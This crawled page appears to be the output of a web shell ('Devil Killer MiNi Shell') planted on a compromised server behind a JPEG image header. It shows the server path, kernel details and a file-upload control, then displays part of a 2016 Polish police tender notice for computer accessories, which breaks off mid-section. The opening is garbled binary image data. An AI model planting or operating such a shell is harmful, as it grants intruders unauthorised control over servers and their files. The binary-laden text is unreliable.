JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160927/314156-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 314156 - 2016
              z dnia 2016-09-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Katowice: Zakup i dostawa akcesoriów komputerowych dla LK, CBŚP, BSW, KMP/KPP i KWP
Katowice<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Komenda Wojewódzka Policji w Katowicach, krajowy numer identyfikacyjny
              27020829200000, ul.
              ul. J. Lompy 
              19,
              40038  
              Katowice, woj.
              śląskie, państwo
              , tel.
              322 002 050, e-mail
              zamowienia@slaska.policja.gov.pl, faks
              322 002 060.
              <br />
              Adres strony internetowej (URL): http://bip.katowice.kwp.policja.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja rządowa terenowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23.11.2012 - prawo pocztowe, osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />Komenda Wojewódzka Policji w Katowicach, ul. Lompy 19, 40-038 Katowice, blok A, parter</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup i dostawa akcesoriów komputerowych dla LK, CBŚP, BSW, KMP/KPP i KWP
Katowice<br /><b>Numer referencyjny: </b>ZP-2380-403-7/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>ROZDZIAŁ I  OPIS PRZEDMIOTU ZAMÓWIENIA

1. Przedmiotem zamówienia jest sprzedaż i dostawa na rzecz Zamawiającego akcesoriów komputerowych określonych w załączniku nr 3 do SIWZ - formularz cenowy. 
2. Szczegółowy sposób realizacji zamówienia został opisany w załączniku nr 2 do SIWZ - projekt umowy.
3. Zamawiający nie dopuszcza składania ofert częściowych.
4. Zamawiający przewiduje następujące rodzaje dostaw:
	1) do jednostek Policji w garnizonie śląskim (wskazanych w Załączniku nr 8  wykaz jednostek, dane 	teleadresowe), dwie dostawy realizowane na zamówienie przesłane drogą elektroniczną, w terminie zgodnym                 	z oświadczeniem złożonym na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ (maksymalnie 6 	tygodni). 
	2) do Komendy Wojewódzkiej Policji w Katowicach, pierwsza dostawa zgodnie z oświadczeniem Wykonawcy 	złożonym na formularzu ofertowym (maksymalnie 6 tygodni) od złożenia zamówienia, następne dostawy 	sukcesywnie w terminie określonym w formularzu ofertowym (maksymalnie 6 tygodni) od dnia złożenia 	zamówienia wg faktycznych potrzeb (nie częściej niż dwa zamówienia w miesiącu).
Uwaga: W przypadku gdy Wykonawca nie wpisze terminu dostawy, Zamawiający uzna na podstawie złożonego oświadczenia w załączniku nr 1 do SIWZ  formularz ofertowy, że Wykonawca dostarczy asortyment                           w maksymalnym terminie tj. 6 tygodni i wówczas zastosuje zasady punktacji zgodnie z Rozdziałem SIWZ. 
5. Zamawiający wymaga aby Wykonawca na dostarczony przedmiot zamówienia w pozycjach wyszczególnionych                 w załączniku nr 3 do SIWZ  formularz cenowy udzielił gwarancji nie mniejszej niż okres wskazany w tym załączniku od dnia podpisania protokołu odbioru jakościowo  ilościowego bez zastrzeżeń przez przedstawicieli stron.
6. Zamawiający żąda aby procesor wskazany w pozycji 83 formularza cenowego - PROCESOR CPU Benchmarks wraz z dedykowanym przez producenta chłodzeniem posiadał wydajność min 5189 pkt w teście PassMark http:cpubenchmark.net - oraz w pozycji 84 formularza cenowego - PROCESOR CPU Benchmarsk wraz z dedykowanym przez producenta chłodzeniem posiadał wydajność min 6343 pkt w teście PassMark http:cpubenchmark.net - niniejszy test stanowi Załącznik nr 4 do SIWZ PassMark - CPU Benchmarks - List of Benchmarked CPUs- z dnia 18_03_2016, w przypadku gdy Wykonawca zaoferuje inny asortyment niż wskazany                                  w pozycjach 83,84,78 i 79 płyty główne (poz. 78 i 79) oraz procesory z wymienionych pozycji 83 i 84 muszą ze sobą współpracować. 
UWAGA: Zgodnie z projektem umowy dopuszcza się zmianę asortymentu, w przypadku wykazania przez Wykonawcę, iż zaoferowany sprzęt został wycofany ze sprzedaży lub zaprzestano jego produkcji, zgodnie ze szczegółowymi zapisami określonymi w projektach umowy.

7. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców
Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 5 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i w projekcie umowy (załącznik nr 2 do SIWZ).

UWAGA!!! Ilekroć w opisie przedmiotu zamówienia (w tym w załączniku nr 3  formularz cenowy do SIWZ) pojawiłyby się nazwy własne, oznacza to, iż Zamawiający dopuszcza produkt równoważny. Za równoważny Zamawiający uzna asortyment o takim samym przeznaczeniu jak wskazany w załącznikach do SIWZ, co najmniej o takim samym zakresie użytkowania lub wyższym. Udowodnienie równoważności asortymentu spoczywa na Wykonawcy.

8. Szczegółowy sposób realizacji zamówienia został opisany w projekcie umowy stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia.
<br /><br /><b>II.5) Główny kod CPV: </b>30237000-9<br /><b> Dodatkowe kody CPV:</b>30237200-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/03/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Od dnia zawarcia umowy do 31.03.2017r. lub do wyczerpania środków finansowych </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Określenie warunków: Wykonawca spełni warunek jeżeli wykaże: Wykonawca musi wykazać się
posiadaniem niezbędnej wiedzy i doświadczenia w zakresie wykonania zamówienia polegającym
na wykonaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy wykonanie jednej dostawy akcesoriów komputerowych o
wartości co najmniej 100.000,00 zł netto lub kilku dostaw w ramach jednej umowy o wartości
łącznej, co najmniej 100.000,00 zł netto 2.2 na podstawie art. 26 ust. 2 ustawy Pzp  Wykonawca,
którego oferta zostanie najwyżej oceniona zobowiązany będzie, na wezwanie Zamawiającego do
przedstawienia: a) dołączenia do oferty wykazu wykonanych dostaw (załącznik nr 6 do SIWZ) w
okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału
w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; oraz z
załączeniem dowodów określających czy dostawy te zostały wykonane lub są wykonywane
należycie. Dowodem, że dostawy zostały wykonane w sposób należyty są : a) referencje bądź inne
dokumenty b) w przypadku zamówienia na dostawy - oświadczenie Wykonawcy - jeżeli z
uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest wstanie uzyskać
referencji bądź innych dokumentów, o których mowa w lit. a). c) w przypadku gdy Zamawiający,
jest podmiotem na rzecz, którego dostawy wskazane w wykazie zostały wykonane, Wykonawca nie
ma obowiązku przedkładania dowodów wskazanych w lit. a) i b) 3. Zamawiający może, na każdym
etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli
zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia
gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. 4. Zgodnie z art.
22a ust. 1 i 2 ustawy prawo zamówień publicznych, Wykonawca może w celu potwierdzenia
spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub
zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim
stosunków prawnych. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów
musi udowodnić Zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi
zasobami tych podmiotów w szczególności przedstawiając w tym celu: 2.1. pisemne zobowiązanie
tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania
z nich przy wykonywaniu zamówienia oraz dokumenty dotyczące: a) zakresu dostępnych
Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu przez
Wykonawcę przy wykonywaniu zamówienia, c) charakteru stosunku, jaki łączy lub będzie łączył
Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu
zamówienia 2.2.oświadczenie, że w celu wykazania spełniania warunków udziału w postępowaniu,
określonych przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia i Ogłoszeniu o
zamówieniu, polega na zasobach innych podmiotu/ów wykazując zakres. 5. Zgodnie z art. 22a ust.
3 ustawy prawo zamówień publicznych, Zamawiający oceni czy udostępniane przez inne podmioty
zdolności techniczne lub zawodowe pozwalają na wykazanie przez wykonawcę spełnienia
warunków udziału w postępowaniu oraz będzie badał czy nie zachodzą wobec tego podmiotu
podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt. 12  23 i ust. 5. pkt 1 6. Zamawiający
dokona oceny spełnienia warunków udziału w postępowaniu na podstawie załączonych do oferty
dokumentów i oświadczeń w formie spełnia, nie spełnia. Wykonawca niespełniający warunków
udziału w postępowaniu zostanie wykluczony zgodnie z art. 24 ust. 1 i/lub ust. 5 pkt. 1,ustawy Pzp.
Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do
udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia
wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: nie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej,
jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku
podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy; 2. Wykaz wykonanych dostaw
zgodnie z załącznikiem nr 6 do SIWZ, w okresie ostatnich trzech lat przed upływem terminu
składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z
podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy
wykonane, wg wzoru załącznika nr 5 do SIWZ, oraz załączeniem dowodów, czy zostały wykonane
należycie 3. Jeżeli Wykonawca, wykazując spełnianie warunków będzie polegał na zasobach innych
podmiotów na zasadach określonych w art. 22a ust. 1 i 2 ustawy Prawo zamówień publicznych:
pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych
zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz dokumenty dotyczące: a)
zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów
innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia, c) charakteru stosunku, jaki
łączy lub będzie łączył Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego
podmiotu przy wykonywaniu zamówienia 4. Wykonawca wykazując spełnianie warunków, o
których mowa w art 22 ust.1 ustawy Pzp, polegający na zasobach innych podmiotów na zasadach
określonych w art. 22a ust. 1 i 2 ustawy Pzp, a jeżeli podmiot ten będzie brał udział w realizacji
części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym
dla Wykonawcy wymienionych w pkt 1 i 2 Rozdziału IV B SIWZ. 5. W przypadku wykonawców
wspólnie ubiegających się o udzielenie zamówienia, dokumenty o których mowa w Rozdziale IV B
pkt 1-2 każdy z członków konsorcjum składa oddzielnie, natomiast wykaz dostaw - załącznik nr 6
do SIWZ  mogą złożyć wspólnie. W przypadku składania oferty przez Wykonawców wspólnie
ubiegających się o udzielenie zamówienia publicznego, każdy z podmiotów występujących w
konsorcjum musi przedłożyć w ofercie dokumenty określone w rozdziale IV litera B punkt od 3 do
5 SIWZ. Dokumenty i oświadczenia wymienione w rozdziale IV litera A oraz IV litera B punkt 1 i 2
mogą przedstawić łącznie. W przypadku doświadczenia za spełnienie warunku zostanie uznana
jeżeli jeden z członków konsorcjum wykonał wymaganą dostawę w rozdziale III punkt 1.2 SIWZ.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawcy zobowiązani są załączyć do oferty następujące dokumenty: 1. Formularz ofertowy
wypełniony zgodnie z załącznikiem nr 1 do SIWZ. 2. Oświadczenia wymagane na podstawie art.
25a ust. 1 ustawy Pzp, złożone na formularzu stanowiącym załącznik nr 5 do SIWZ oraz aktualne
na dzień składania ofert. 3. Formularz cenowy wypełniony zgodnie z załącznikiem nr 3 do SIWZ 
podpisany przez osobę upoważnioną, oraz wersja elektroniczna (edytowalna wersja arkusza
kalkulacyjnego)  załączona na płycie CD. W przypadku nie załączenia formularza cenowego w
wersji papierowej, oferta Wykonawcy zostanie odrzucona na podstawie art. 89 ust. 1 pkt. 2 PZP.
Nie załączenie do oferty formularza cenowego w formie elektronicznej nie będzie skutkowało
odrzuceniem oferty. W przypadku rozbieżności pomiędzy wersją papierową i elektroniczną wiążąca
będzie wersja papierowa. Wykonawca w terminie 3 dni zostanie poproszony do uzupełnienia
formularza elektronicznego. UWAGA: a) Wykonawca, który powołuje się na zasoby innych
podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w
zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zobowiązany jest
zamieścić informacje o tych podmiotach we wskazanym wyżej oświadczeniu b) Wykonawca, który
zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku
istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu zobowiązany jest do
zamieszczenia informacji o podwykonawcach we wskazanym wyżej oświadczeniu c) W przypadku
wspólnego ubiegania się o zamówienie wskazane wyżej oświadczenie składa każdy z wykonawców
wspólnie ubiegających się o zamówienie. 4. Oświadczenie o gwarancji na przedmiot zamówienia
dla każdej pozycji zgodnie ze wskazaną przez Zamawiającego gwarancją Załączniku nr 3 do SIWZ
 formularz cenowy. 5. Oświadczenie o terminie dostawy - złożone na formularzu ofertowym
(załącznik nr 1 do SIWZ). 6. Oświadczenie, że dostarczony asortyment wskazany w załączniku nr 3
do SIWZ jest produkowany jako fabrycznie nowy, wolny od wad technicznych i prawnych,
dopuszczony do obrotu oraz gatunku I-go - złożone na formularzu ofertowym (załącznik nr 1 do
SIWZ). 7. Zgodnie z art. 91 ust. 3A ustawy Pzp. Wykonawca jest zobligowany do oferty załączyć
informację na formularzu ofertowym o następującej treści Składając ofertę informujemy
Zamawiającego, że wybór będzie*/ nie będzie* prowadzić do powstania u Zamawiającego
obowiązku podatkowego. Jednocześnie ze złożonym oświadczeniem, podajemy nazwę (rodzaj)
towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania
.. , oraz wskazujemy ich wartość bez kwoty podatku </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
